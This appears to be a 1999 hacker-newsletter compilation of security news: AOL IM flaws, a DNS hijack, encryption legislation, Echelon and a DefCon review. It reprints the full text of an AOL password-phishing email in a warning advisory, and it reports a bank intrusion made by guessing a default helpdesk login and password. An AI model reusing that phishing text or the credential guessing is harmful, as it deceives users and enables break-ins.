http://www.zdnet.com/filters/printerfriendly/0,6061,2316917-2,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Is AOL hacking IM users?
By David Raikow, Sm@rt Reseller
August 18, 1999 3:04 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2316917,00.html
As the Instant Messaging war rages on, evidence is mounting that suggests America Online Inc. is
using a security hole in its own software to lock out IM clones.
While security experts are still examining IM logs to determine precisely what is going on, it looks
like AOL's tactics may have put its own users at serious risk.
The first hint of a problem came last Wednesday, when an individual identifying himself as "Phil
Bucking" of "Bucking Consulting" sent an e-mail to PharLap Software President Richard Smith
warning of a "buffer overflow" vulnerability in the AOL IM client. Smith, a noted security expert,
quickly determined that the e-mail had been falsified, and had almost certainly come from within
Microsoft. Microsoft has flip-flopped on whether or not the e-mail message actually came from
one it its employees.
Because of the identity question, the allegations of "Mr. Bucking" initially garnered little serious
attention. On Monday, however, Robert Graham, chief technical officer with Network Ice
Software, a software security firm, released a detailed analysis of the AOL IM logon procedure,
which suggests a vulnerability almost identical to that described by "Bucking".
A very serious threat
The security community is now taking the threat very seriously.
"Buffer overflow" vulnerabilities allow an intruder to trick a susceptible machine into executing
code by sending it more information than it is configured to receive. These attacks require a great
deal of technical knowledge to develop, but are often automated with script tools and used to
compromise network servers by skilled hackers and "script kiddies" alike.
While emphasizing that the evidence is still preliminary, PharLap's Smith said he believes that AOL
has been using this technique to trigger specific responses from its IM clients. Because Microsoft's
IM clients do not have this bug, AOL servers can identify them, and lock them out of the system.
This bug has only been observed on Windows clients; it is not clear how other platforms are
affected.
Smith said he sees this as a very serious potential threat to users. As Microsoft continually updates
its clients, AOL must keep introducing new variations on the buffer overflow to stay ahead.
"It's only a matter of time before they make a mistake, and machines running AOL IM start
crashing all over the Net," Smith predicts.
Smith added that the hole gives AOL an extraordinary amount of power over users' machines.
"Remember that this is a technique normally used by hackers to break into machines. The current
use seems pretty benign, but AOL can use this to execute any arbitrary code on a Windows
machine -- run software, leave backdoors, whatever. What happens if a disgruntled AOL
employee finds a use for this?" Smith warned.
Larger potential danger
Graham said he concurs with Smith's assessment, though he sees an even larger potential danger:
"If hackers managed to masquerade as an AOL server, they could do anything to the target
machine. This could be a real problem for cable modem and DSL users, who have 24-hour
connections and are vulnerable to 'man-in-the-middle' attacks."
Graham noted that such attacks are unlikely in the near future because of the technical expertise
required, but are a very real possibility.
AOL did not respond to requests for comment on these latest charges by press time.
@HWA
49.0 Anti-gay site is hacked
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest
In what appears to be a simple internic spoof the
registration information for godhatesfags.com was
changed to the owner of godlovesfags.com. It is
unknown if the first domain became unregistered or if
the perpetrator somehow fooled Network Solutions into
changing the information. Unfortunately it does not
appear that anyone who has written a 'news' article
about this has any idea how the internet works, making
it hard to determine exactly what happened.
Hackers reverse message on
anti-gay Web site
August 19, 1999
Web posted at: 5:22 p.m. EDT (2122 GMT)
By Robin Lloyd
CNN Interactive Senior Writer
(CNN) -- Hackers switched the
message from hate to love on a
notorious anti-gay site on the
Internet.
A 2-year-old Web site
www.godhatesfags.com put up by
Pastor Fred Phelps' Westboro
Baptist Church in Topeka, Kansas,
was hacked Wednesday to re-route
visitors to www.godlovesfags.com,
featuring a pink and purple pro-gay banner, links to gay news Web sites and
a quote from Ellen DeGeneres.
"Hate will not be tolerated on the Internet," said Kris Haight on Thursday.
Haight says he registered the domain name for the pro-gay site more than a
year ago and gave the OK for the re-routing within the past two days.
"Phelps teaches hate and a lot of it is untrue.
People who go to their site and want to find hate
aren't going to find it, at least until he gets the
domain back."
The pro-gay site, usually visited daily by only a
handful of people, got 8,000 hits in the past 24
hours, Haight said. The pages were written by
Rich Macky of Omaha, Nebraska, Haight said.
The switch did not show up on all computers
Thursday as it takes time for the re-routing to
take effect on servers worldwide.
Phelps' daughter, Shirley Phelps-Roper, said the hack is just one of more
than a dozen tricks played on the church's Web site in the past two years.
"No, my dear, it's not all that drastic," she told CNN Interactive. "It's just
another fag ploy to try to bury the truth of God and the Earth. It's a
temporary inconvenience."
Phelps-Roper, who also serves as the church's attorney, said it would take a
couple days of paperwork on her end to correct the re-routing.
Fred Phelps, whose congregation regularly engages in anti-homosexual
picketing, demonstrated at the funeral of Matthew Shepard, a 21-year-old
gay man who was savagely beaten to death in a Wyoming hate crime.
Hacker hit DNS
Haight said he didn't know who originated the hack, which involves
re-routing godhatesfags.com visitors via the Domain Name System, a
network of servers which translates alphabetic domain names into numeric
IP, or Internet Protocol, addresses.
Haight, a 22-year-old gay man living in Newport, New Hampshire, said he
registered the pro-gay domain name a year or so ago when he found out
about Phelps site, which he says he found disgusting.
He recently received an anonymous e-mail advising him to watch the Internet
contact information for his site.
Wednesday, Haight got a chance to change that information. "I set up the
server to point godhatesfags to godlovesfags," he said.
Later, he received another e-mail saying the address swap worked.
Haight is part of a group of Internet denizens known as Mindsprung, a play
on the popular Internet service provider Mindspring. Haight owns domain
names for a couple other Web sites, including www.gaycollegeboys.com, an
IRC chat discussion page.
Phelps-Roper said the 100-member church has been forced to switch
servers a few times due to all the digital attacks on the site. The church
sponsors another Web site -- godhatesamerica.com.
"We're busy people, not thwarted or detracted by one more assault on our
ministry," she said. "It's like 'ho hum.'"
@HWA
50.0 Indonesian CyberWar? Or Not?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
On Wednesday Nobel Peace Prize laureate Jose
Ramos-Horta claimed that hundreds of people around
the world were poised to launch a cyber attack against
Indonesia should there be any tampering in the election
process for East Timor's freedom.
Yesterday HNN cast grave doubts on this claim having
seen absolutely no evidence to support it.
Connect Ireland, the ISP that hosts the virtual top level
domain of .tp for East Timor has released a press
release also saying that they have not seen nor heard
of any preparations for any electronic retaliation. C-I
also urges all people to leave the internet for
communication and not to attack other peoples freedom
of speech via the internet.
San Jose Mercury News - Story on Jose Ramos-Horta's statements
http://www7.mercurycenter.com/premium/world/docs/cyberwar19.htm
HNN Archive for August 19, 1999
http://www.hackernews.com/archive/arch.html?081999#2
Press Release from Connect Ireland
http://www.hackernews.com/orig/conire.html
Press Release - from Connect - Ireland
Communications Ltd. 4.30pm GMT,
Thursday 19th August 1999, Dublin.
Connect-Ireland's response to the call for
Cyber War against Indonesia.
In a number of recent international newspapers, articles
have appeared quoting Ramos Horta in the context of the
threat of the use of cyberwarfare against Indonesia.
There are some points I would like to make to correct
some of the content in these articles. The attack on us -
which was a culmination of attacks over 9/10 months was
NOT directed at a web site - but at the cctld - top level
domain - for East Timor (.tp) - and therefore much more
serious than stated..
During the course of the attack, we established that the
perpetrators had a full domain registry with them and were
endeavouring to establish spurious domains - which we
can but assume were for neferious purposes and
presumably these would reflect badly on the Call for
Freedom by the East Timorese.
Our activities and initiatives have established East Timor's
virtual independence, at least as far as the Internet is
concerned.
After the attack we received many positive offers of
support and assistance. The offers also included possible
revenge attacks against Indonesia - which we stated
categorically that we did not want or condone.
We have not heard from anyone in the current call for
such action by Ramos Horta either in the Irish Internet
community or any other location. If we had heard of such
a potential action, C-I would have endeavoured to
dissuade the use of such options and activities and
hopefully would have directed the interest and intellectual
capacity to more fruitful channels.
I would like to make our position extremely clear.
We do not condone attacks of any kind on the Internet or
other similar technologies. We believe in the freedom of
speech and in everyone's ability to conduct their
communication for their own legitimate purposes. We (C-I)
believe there is more to be gained by maintaining the
opportunities that can be developed through free speech
than in conducting cyberwarfare.
I would also like to add that after the attack on us, we
received support from many Indonesians - who translated
our statement(s) into the many languages that are used
within that territory and circulated these widely.
We (C-I) are NOT at war with the Indonesian People.
We were completely unaware of the proposed activity as
given by Horta.
We have not been approached in recent months by
anyone who has stated that they wished to participate in
an activity of this nature. The response that we received
after the attack from the 'hacker' cyber community was all
very anti cyber terrorism.
Since the beginning of this year, we have been informed
on good authority that over 5000 East Timoreans have
been killed. In this light, I can perceive that leading
activists in the cause for East Timor are under
considerable pressure and this will continue until the
implementation of full and open democratic processes are
in place in East Timor.
To my mind Ghandi would have made a much better
Internet strategist than Hitler. Connect-Ireland believes in
the freedom of speech. We believe that all lines of
communication should always be kept open as there is
more to gain through this process.
I can think of no better environment for managing "Jaw-
Jaw rather than War-War" - than the Internet.
Martin Maguire
Project Director
Connect-Ireland Communications Ltd.
19th August 1999
Connect-Ireland Communications Ltd.,
20 Mark St.,
Dublin 2
Tel:+353-1-6706701 Fax:+353-1-6790089
Mob.+353-86-UCALLME
URL: http://www.connect.ie
-Internet for Everyone-
51.0 Gov Wants to Break Into to Personal Computers, Legally
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by AlienPlague
A proposed 'Cyberspace Electronic Security Act,' would
give the DoJ additional powers to break into personal
computers. The DoJ memo dated August 4, would allow
the government to disable encryption on the machines
and to gather passwords.
Washington Post
http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm
CNN
http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html
Yahoo News
http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html
Justice Department Mulls Covert-Action Bill
By Robert OHarrow Jr.
Washington Post Staff Writer
Friday, August 20, 1999; Page A1
The Justice Department wants to make it easier for law enforcement
authorities to obtain search warrants to secretly enter suspects' homes or
offices and disable security on personal computers as a prelude to a
wiretap or further search, according to documents and interviews with
Clinton administration officials.
In a request set to go to Capitol Hill, Justice officials will ask lawmakers to
authorize covert action in response to the growing use of software
programs that encrypt, or scramble, computer files, making them
inaccessible to anyone who does not have a special code or "key,"
according to an Aug. 4 memo by the department that describes the plan.
Justice officials worry that such software "is increasingly used as a means
to facilitate criminal activity, such as drug trafficking, terrorism,
white-collar crime, and the distribution of child pornography," according
to the memo, which has been reviewed by the Office of Management and
Budget and other agencies.
Legislation drafted by the department, called the Cyberspace Electronic
Security Act, would enable investigators to get a sealed warrant signed by
a judge permitting them to enter private property, search through
computers for passwords and install devices that override encryption
programs, the Justice memo shows.
The law would expand existing search warrant powers to allow agents to
penetrate personal computers for the purpose of disabling encryption. To
extract information from the computer, agents would still be required to
get additional authorization from a court.
The proposal is the latest twist in an intense, years-long debate between
the government and computer users who want to protect their privacy by
encrypting documents.
Although Justice officials say their proposal is "consistent with
constitutional principles," the idea has alarmed civil libertarians and
members of Congress.
"They have taken the cyberspace issue and are using it as justification for
invading the home," said James Dempsey, senior staff counsel at the
Center for Democracy and Technology, an advocacy group in the District
that tracks privacy issues.
Police rarely use covert entry to pave the way for electronic surveillance.
For example, federal law enforcement agencies obtained court approval
just 34 times last year under eavesdropping statutes to install
microphones, according to the 1998 wiretap report issued by the
Administrative Office of the Unites States Courts.
David L. Sobel, general counsel at the Electronic Privacy Information
Center, predicted the number of secret break-ins by police would soar if
the proposal is adopted because personal computers offer such a
tantalizing source of evidence for investigators -- including memos, diaries,
e-mail, bank records and a wealth of other data.
"Traditionally, the concept of 'black bag' jobs, or surreptitious entries,
have been reserved for foreign intelligence," Sobel said. "Do we really
want to alter the standard for physical entry?"
The proposal follows unsuccessful efforts by FBI Director Louis J. Freeh
and other Justice officials to secure laws requiring computers or software
to include "back doors" that would enable investigators to sidestep
encryption.
Those proposals, most notably one called Clipper Chip, have been
criticized by civil libertarians and have received little support in Congress.
In a snub of the administration, more than 250 members of Congress have
co-sponsored legislation that would prohibit the government from
mandating "back doors" into computer systems.
"We want to help law enforcement deal with the new technologies. But we
want to do it in ways that protect the privacy rights of law-abiding
citizens," said Rep. Robert W. Goodlatte (R-Va.), who originally
sponsored the legislation, known as the Security and Freedom Through
Encryption Act. Goodlatte said the Justice Department's proposal might
upset the "very finely tuned balance" between law enforcement power and
civil liberties.
But Justice Department officials say there is an increasingly urgent need for
FBI agents and other federal investigators to get around encryption and
other security programs.
"We've already begun to encounter [encryption's] harmful effects," said
Justice spokeswoman Gretchen Michael. "What we've seen to date is just
the tip of the iceberg."
The proposed law also would clarify how state and federal authorities can
seek court orders to obtain software encryption "keys" that suspects might
give to others for safekeeping. Although few people share such keys now,
officials anticipate that they will do so more often in the future.
Administration officials played down the potential impact on civil liberties.
In interviews, two officials said the law would actually bolster privacy
protections by spelling out the requirements for court oversight of
cyber-surveillance and the limits on how information obtained in a search
could be used.
"The administration is supportive of encryption. Encryption is a way to
provide privacy, but it has to be implemented in a way that's consistent
with other values, such as law enforcement," said Peter P. Swire, the chief
White House counselor for privacy. "In this whole debate, we have to
strike the right balance."
Computer specialists predict that people under investigation will take
countermeasures.
"It's 'Spy vs. Spy,' " said Lance Hoffman, director of the Cyberspace
Policy Institute at George Washington University, who praised the
administration for raising the issue but expressed skepticism about the
proposal as it was described to him.
"I'd be leery if I were the government. . . . They have to be real careful,"
he said.
© 1999 The Washington Post Company
-=-
CNN;
Feds want authority to
secretly crack personal
computer codes
August 20, 1999
Web posted at: 12:49 a.m. EDT (0449 GMT)
WASHINGTON (AP) -- The Clinton
administration reportedly plans to ask
Congress to give police authority to
secretly go into people's personal
computers and crack their security
codes.
Legislation drafted by the Justice Department would let investigators get a
sealed warrant from a judge to enter private property, search through
computers for passwords and override encryption programs, The
Washington Post reported Friday.
The newspaper quoted an August 4 department memo that said encryption
software for scrambling computer files "is increasingly used as a means to
facilitate criminal activity, such as drug trafficking, terrorism, white-collar
crime and the distribution of child pornography."
Under the measure, investigators would obtain sealed search warrants
signed by a judge as a prelude to getting further court permission to wiretap,
extract information from computers or conduct further searches.
Privacy advocates have objected to the plan, dubbed the Cyberspace
Electronic Security Act by the Justice Department. "They have taken the
cyberspace issues and are using it as justification for invading the home,"
James Dempsey, an attorney for the Center for Democracy and Technology,
told the Post.
Peter Swire, the White House's chief counselor for privacy, told the
newspaper the administration supports encryption as a way to provide
privacy for computer users.
"But it has to be implemented in a way that's consistent with other values,
such as law enforcement," Swire said. "In this whole issue we have to strike
the right balance."
The administration has for years been seeking a law to require computer
makers to include a so-called Clipper Chip in their products that would give
police a "back door" into computers despite any encryption software they
may contain.
In a backlash, more than 250 members of Congress have signed on as
co-sponsors to legislation that would prohibit mandating such back-door
devices on computers.
Copyright 1999 The Associated Press. All rights reserved.
52.0 Hearings to be Held on Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The House Government Reform and Oversight Committee
will hold hearings on such surveillance programs as the
National Security Agency's "Project Echelon," the NSA's
global eavesdropping network. Earlier this year
committee Chairman Dan Burton (R-IN) amended the FY
2000 Foreign Intelligence Authorization Act to require
the DoJ, the NSA, and the CIA to submit to Congress a
report detailing the legal standards the agencies use
when they eavesdrop on American citizens.
US House of Representatives
http://www.house.gov/barr/p_081699.html
53.0 AOL Password Scam Uncovered
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Webmaster
The Shadow Knights Security Corp. has released an
advisory that details a new scam that they have
discovered that attempt to steal AOL users passwords.
Basically an email is sent to the user which directs them
to a fake AOL NetMail page where they are prompted to
enter their username and password to read unread mail.
The Shadow Knights Security Corp
http://www.ShadowGovt.net/Texts/aolscam2.html
Brief written by - - The Phantom x^\|/^x
http://angelfire.com/oh3/preview/ ::mirror:: http://www.ShadowGovt.net/aolscam/
The above link is from a scam e-mail that has been sent to who knows how many AOL members. This time the setup is
even more elaborate than the site our last advisory was about. Our last advisory is similar to this one however, we feel the
need to reiterate our position.
Why a scam works:
This scam setup and procedure is similar to all most AOL password scams, however, someone spent time on this one.
AOL users tend to not be familiar with the 'real' Internet. This is not saying AOL users (in general) are not as smart as other
ISP users, however, AOL users do lead a sheltered internet existence. A built in browsers, their own chat rooms, their own
'Instant Messages', even your own AOL buddy list. AOL is a great ISP for those who are beginning net users and for those
who wish to venture out, start leaving that AOL window and go out and find things on your own. Being this enclosed leaves
AOL users to communicate only with other AOLers and less with the other ISP users. Research done previously by TSK
Security Corp. suggest that 86% of AOL users who received this e-mail will visit the site; 62% of AOL users who received
this e-mail will give their password and logon to the site
The setup:
AOL security breaches are more often then not, attempted using our good friend Social Engineering. I received the e-mail
via BCC from MAIL36@aol.com. The scam includes a subject of 'AOL NetMail 2.0' and the body contains claims of:
'We have noticed that you have not been using America Online NetMail.
You currently have: [5] unread message(s)'
The body of message also includes details that 'Many times urgent messages are sent to NetMail, due to
confidentiality, or privacy.' Upon visiting the page you see what looks like the AOL NetMail page however, on this page
is an Angelfire banner. Note: Angelfire is not owned by AOL and you should never trust an internet site UNLESS it is on
the relevant domain (AOL.com).
Example: If you are told to visit the new Hacker News Network (hackernews.com) and the link sends you to an Angelfire
or Tripod account DON'T BELIEVE THAT YOU ARE AT HackerNews.com .
These scams will only continue if ignorance seems never to subdue. Please, if you are an AOL user (like myself) never,
ever, EVER giveaway your account information to an unauthorized source. AOL Staff will NEVER ask for your password
to your Logon account. Below is the exact text of the scam e-mail (A).
I have checked out the supposed links above and they look to be from a free CGI Scripting Service. If you do receive this
scam or similar scam e-mail, forward all the scam e-mails to TOSEMail1@aol.com .
Webmaster@ShadowGovt.net -
TSK Security Corporation - http://www.ShadowGovt.net
KnightNews Network - http://www.HackerNews.net
(A).
"Dear Member
AOL NetMail 2.0
We have noticed that you have not been using America Online NetMail.
You currently have: [5] unread message(s)
To check your E-Mail please goto: Netmail Preview (http://angelfire.com/oh3/preview/)
Many times urgent messages are sent to NetMail, due to confidentiality, or privacy.
For more information please Email
AOLNetMail@AOL.Com
Thank you
Mike Bowers
AOL NetMail 2.0
©1999 America Online"
@HWA
54.0 Bronc's Defcon VII Review
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Bronc Buster
The Synthesis has finnally posted a review of Defcon
VII, that was in their last print issue, onto their web
site. The review is authored by someone you might
know, Bronc Buster.
The Synthesis
http://www.thesynthesis.com/tech/defcon/vii.html
DefCon 7
Hackerz, Phreakerz and Fedz: Three Days of Fear and Loathing in Las Vegas
By Bronc Buster
We flew into Las Vegas on Wednesday, hoping to get to check out the hotels and casinos on the strip before it all started. How were we to know the
worst floods in Las Vegas history would happen, and that we would be told to stay in our hotel rooms for our own safety? What a beginning to a
long five days, and another weird kick off for another installment of DefCon. This was DefCon 7, the annual hacker convention that happens every
year in Las Vegas.
Everyone comes to DefCon: Teams from Microsoft and Intel, Federal Agents, elite underground figures, a huge number of hackers and phreakers,
and even high school kids who must have ran away to come, because they look far too young to be in the city of sin by themselves. They come from
all over the world: from Australia, Kuwait, Europe, South America, you name it. So for those of you not familiar with DefCon, you are asking yourself
what would bring all these peoplewell over 3000 by some estimatesto the Alexis Park Hotel for this three-day event. Well, ask each different
person and you will get a different answer.
DefCon had three different speaking tracks this year, ranging from newbie to advanced topics, like how to take over PBX phone systems, to a simple
introduction to TCP/IP, which is the protocol the Internet uses to function the way it does. Now, on the surface it may sound like a normal
convention just like any other, but once you get there, you notice some strange things happening.
There were vendors selling everything from very real-looking fake IDs to books, old
computer hardware and military computer equipment, T-shirts and CDs with alternate
operating systems, like FreeBSD and Linux. There was a scavenger hunt, in which the
items to be collected included everything from a satellite dish off the top of a famous
casino, to a menu from a local restaurant. They had "hacker death matches" in huge,
inflatable sumo outfits, that paired off people who may hate each other online, but have
never seen each other in real life. Popular yearly games are played, like Hacker Jeopardy,
in which teams of hackers get onstage in a game of Jeopardy to see who knows the most,
with the losers having to drink large amounts of beer. The l0pht (pronounced Loft) also
holds a TCP/IP drinking game, where people shoot it out on stage to see who knows the
most about the complex inner-workings of the net, with the losers having to drink large
amounts of beer. Another popular game that goes on throughout the entire convention is "Spot the Fed." This is where normal con goers try to pick
out the feds who might be in the crowd mingling. Its all in good fun, and if spotted, they are brought on stage, asked to show their ID, and then
given a round of applause and T-shirt saying "I am a Fed."
As the years roll by and DefCon gets larger and larger, it attracts more and more people. This was apparent in how serious the U.S. Government is
taking it, this year hosting its own panel where people could ask questions to agents from the National Security Counsel, the White House and the
NSA. More apparent were the masses of media people who showed up. More than 300 press passes were given out, and there were over 20 film
crews on hand, from CNN to Z-Net, and TV stations from all over the world. Needless to say, it is almost unbelievable seeing it go from what it was 7
years agowhen it was a gathering of a few hundred people run by a group of friends who had the wild idea to get together to have to fun in Las
Vegasto what it is today.
One of this years highlights included a presentation from a group called the Cult of the Dead Cow, or cDc for short, who released an updated
version of their remote administration tool called Back Orifice 2000 (BO2K). In addition to its legitimate useremotely administrating
networkscritics say it can also take over other peoples computers over the Internet if someone were to be duped into installing it onto their
system. BO2K has the ability to take over the mouse and keyboard of a victims computer, and in addition to logging everything a person might
type, it can provide a video feed in real time, so one can watch what the victims computer is doing, what is being clicked on, and what is being seen.
Similar to last years presentation (when the group announced their original Back Orifice tool), this year the cDc made a grand entrance with strobe
lights, loud techno music and spinning cow skulls on the walls. It was standing room only for their almost two-hour presentation.
Another highlight, and always a favorite, was Capture the Flag. Now, this is not the game
you played when you were a kid, this is Capture the Flag, hacker-style. People set up
target boxes and put them on a network in one of the convention rooms, while other
people hook up their laptops and try to break into them to plant their groups "flag."
These boxes vary in types and operating systems, and they are not your run of the mill
systems, either. The owners secure them and try to make it a difficult task for people to
get on. This year, a group calling itself the "Ghetto Hacker" took first prize by getting
onto the most boxes and defending them from other groups who were hard at work trying
to follow them.
As you can no doubt imagine, as much play as serious work goes on at this con, which is why people say that is it so popular. The parties go on
long into the night, and the speakers do not start until noon or so, then fade into the games, which last until midnight or longer. The Alexis Park was
kind enough to stock Jolt Cola for the con-goers to help keep them going, and the Dis.Org Crew (the DOC) brewed, and then gave away case after
case of caffeinated beer to also help keep the parties going strong.
Now, you may be getting the idea that DefCon is nothing more then a three-day long party, but thats only part of it. The convention features
speakers on a variety of topics: this year, there were federal agents talking about legal matters and what the government is planning on doing for the
future of the Internet; lawyers talking about rights and how they relate to the Internet; people talking about various security problems with different
systems and software; investigators talking about online forensics and intruder-detection systems; reporters talking about what it is like reporting
on the hacking underground, and much, much more.
In the past, DefCon was looked on as a freak show of sorts, where people with multiple body piercing and colored hair were the norm. Now, as it
grows, it almost looks as if this year that was the exception rather then the rule. More women are showing up, as well as people from all ethnic
backgrounds, and more people are in their late 20s now (like me), rather then the pale youngsters of past conventions. The only thing that has
remained from the days of yore is the party attitude.
As you can imagine, not everything goes according to plan when you get over 3000
people with a lot of technical skills and a lot of beer in one place. The lights and climate
controls were messed with more than once, and the radio channels the hotel security used
had to be changed several times as well because their channels were being taken over by
short wave radios that many people were carrying on their belts. Other classic pranks
were pulled as well: soap was poured into the hotel fountain, beer bottles were left
floating in the pool, and streakers ran through the con from time to time (men and women).
After the first day, the hotel had to double its security, but as with most hotels that have
hosted DefCon in the past, it was not ready for what came with the con. On Saturday,
some poor couple got married and had their reception at the Alexis Hotel; they were
surrounded by freaky people con-goers and left shortly after their party arrived.
The cons organizer, Jeff Moss (who goes by the name Dark Tangent), was strangely absent this year for most of the con. In past years, Moss was
almost omnipresent, constantly up on stage with announcements and fixing problems that arise during the three-day con. In his absence, a large
fellow name Priest ran the con, and run it he did, with an iron hand. He was a cross between a Nazi SS trooper and a pro wrestler, throwing people
out on a whim and canceling presentations by people he didnt like. If there was anything that could have made a fun three days turn bad, he was it.
Lucky for us con-goers, Moss would pop in from time to time and defuse things, which kept the con moving with only a few bumps.
The whole idea behind DefCon is to make a place where people can meet their friends and enemies, people they may only know online; where people
can learn and exchange ideas; where anyone can come and get a look inside the hacker underground and see that its not some dark, scary place
some reporters make it out to be, but rather a preview of the movers and shakers of the next century. These people are not trying to take over the
Internet, they are just trying to improve it and keep companies honest in their work and what they release.
Who knows, maybe if wed had a DefCon 20 years ago, we would not be facing the Y2K problem now, because after all, the Internet is going to be
around for a long time, and these people who spend a large amount of their time online want nothing more than to see it improved.
Bronc Buster is a California-based hacker whose exploits have been featured in the LA Times.
@HWA
55.0 Y2K Survival Catalog
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by techs
Worried about Y2K? Fear the end of the world as we
know it? Afraid you might run out of breath mints?
Wonder how your going to generate random numbers
when the power fails? Get all of your Y2K survival needs
here.
Y2K Survival Catalog
http://www.brunching.com/features/feature-y2kcatalog.html
@HWA
56.0 BELGIAN BANK COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~
From www.net-security.org
by Thejian, Friday 20th August 1999 on 3:00 am CET
DeCursor.com reports today that the hacker ReDaTtAcK, who only a few days ago
hacked the Belgian ISP Skynet, yesterday successfully intruded the
computersystems of the Generale Bank, the biggest bank in Belgium. Making use of
the banks' remote banking program and by guessing the helpdesk accounts' login
(helpdesk) and password (hlpdsk) he was able to bruteforce the user accounts on the
system and in doing so he claims to have access to account info, transactions and
login codes. The bank says it won't press charges and might even ask the hacker for
his assistance in fixing the problems.
@HWA
57.0 CARDING IN NEWCASTLE
~~~~~~~~~~~~~~~~~~~~
From www.net-security.org
by Thejian, Friday 20th August 1999 on 1:00 am CET
Thieves in Newcastle are using the Internet to buy goods, charging them to other
people's credit cards. Detectives have established how the thieves operates but are
unsure how they are obtaining details of other people's credit cards, a lot of the
victims never used the Internet to buy anything, so there is no reason why their credit
details are availble to third parties. Read the story
Net theft is on the cards
19aug99
THIEVES in Newcastle are using the Internet to buy goods, charging
them to other people's credit cards.
The scam has been used to buy property including $500 worth of
computer software and theatre tickets.
Detectives have established how the thieves operates but are unsure
how they are obtaining details of other people's credit cards.
"We are puzzled how he is finding out details of these people's
accounts," Detective Senior Constable Wayne Moulton said.
"A lot of these victims have never used the Internet to buy anything
so there is no reason why their credit details would be accessible."
Police said card numbers and names had been checked before the
goods were dispatched, but were found to be valid and were
processed by retailers.
Det Moulton said the goods were "sent to empty homes or places
where the people are away
@HWA
58.0 U.S.-British Cyber-Spy System Puts European Countries on Edge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Zombie Cow <waste@zor.hut.fi>
http://www.latimes.com:80/excite/990816/t000072952.html
Monday, August 16, 1999
Digital Nation
U.S.-British Cyber-Spy System Puts European Countries on Edge
By GARY CHAPMAN
OVERETO, Italy--It felt like there was a new Cold War developing at a
conference here last week on computers, networks and international
security, only this time the adversaries are the United States and Europe
and the field of conflict is cyberspace.
The revelation last year about the collaborative electronic eavesdropping
system developed by the U.S. National Security Agency and British
intelligence agencies, a system known as Echelon, has become a huge topic
of discussion in Europe.
The Echelon system can and does intercept "all e-mail, telephone and fax
communications" in Europe, according to a report delivered last year to
the European Parliament, and further investigations revealed that this
capability also covers Australia, New Zealand and other countries.
The report's author, Steve Wright, director of Omega Foundation, a
British human rights group, was here last week and summarized his
investigation into Echelon.
"The Echelon system forms part of the U.K.-U.S.A. system but unlike many
of the electronic spy systems developed during the Cold War, Echelon is
designed for primarily nonmilitary targets: governments, organizations and
businesses in virtually every country," states Wright's report, "An
Appraisal of Technologies of Political Control," (available on the Web at
http://cryptome.org/stoa-atpc.htm).
The report was prepared for the European Parliament's Scientific and
Technological Options Assessment (STOA) group. Its release in early 1998
shocked European government leaders.
[snip..]
ISN is sponsored by Security-Focus.COM
@HWA
59.0 Watching the digital detectives.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ft.com/hippocampus/q13c04e.htm
Life / Technology
SURVEILLANCE: Watching the digital detectives
Software that analyses video tape has brought total surveillance a step closer,
says Alan Stewart
The recent film Enemy of the State contains a chilling
account of what might happen when the security
services turn on an innocent man, unwittingly involved
in their affairs.
The film centres on an attempt to introduce a new law
allowing the US government access to the video
footage from surveillance cameras in shopping malls,
petrol stations and street corners. It soon becomes
clear, however, that the security services are already using video from those
sources.
Now, in the real world, a new software technology that can analyse and index
video is being introduced by Cable News Network (CNN) to help it keep its
competitive edge. Of obvious interest to television news companies, this
video-searching capability is also being used by security services on both
sides of the Atlantic.
"We take the incoming video signal, whether it's off a tape or satellite dish,
and extract what we call 'metadata' or index data," says Paul Lego, chief
executive of Virage, one of the suppliers of video search software (see
accompanying story). "We like to say we watch, read, and listen to the
video."
By 'watching' it, the software examines the frames of the video as they are
read in, and when the picture changes sufficiently, a time-stamped 'key-frame'
is stored in a database as metadata. If the video contains text (either teletext
or close-captioning), this is 'read' and also time-stamped.
The search software also 'listens' to the video, using an International Business
Machines speech-to-text system which identifies speakers from a library of
voices. "We can also, to a large degree, understand what they're saying - at
least, at the key-word level," explains Mr Lego. Transcription is not yet
perfect, but an accuracy of between 30 per cent (outdoors) and 90 per cent (in
a studio) is possible.
Users can search the database of metadata via the internet, by keying in the
name of a person and a topic. "You might get back five video clips," says Mr
Lego. "You can click on any of those and the software will cue to the point
where that subject is being talked about."
Mr Lego believes there is a huge government market for video analysis
software, with about a third of Virage's business already being for US
government agencies such as the FBI, CIA, Nasa, National Security Agency,
National Image Mapping Agency, and Joint Combat Camera Command.
The US Army and Air Force both use software from Islip Media, a rival video
analysis company whose other users include the Department of Energy's
Lawrence Livermore National Laboratory, and the National Institute of
Standards and Technology.
"The government watches every TV station in the world, looking for key
events," says Mr Lego, who likens it to a huge TV network for every channel in
the world, with an added requirement to analyse and translate languages. "In
addition, there's a lot of stuff they watch that isn't what you would call
broadcast television," he adds.
The UK counterparts of the US security agencies are also using the same
software to enable transatlantic trading of data.
For the past few months, meanwhile, CNN has been testing a new system
using Virage video analysis software, and this is now going into live operation.
Twenty four hours a day, seven days a week, CNN's 1,500 editors receive 32
newsfeeds, which used to be recorded on to video tapes. Now the feeds are
recorded digitally, together with the associated script and news data, so
editors have access to them from their desktop.
Other US TV networks are already using video analysis systems (CBS with
IBM's DB2 Digital Library, and NBC with Islip's MediaSite). European
broadcasters including the BBC and Carlton in the UK and Spain's Telecinco
and Network España have expressed interest or are running pilot schemes.
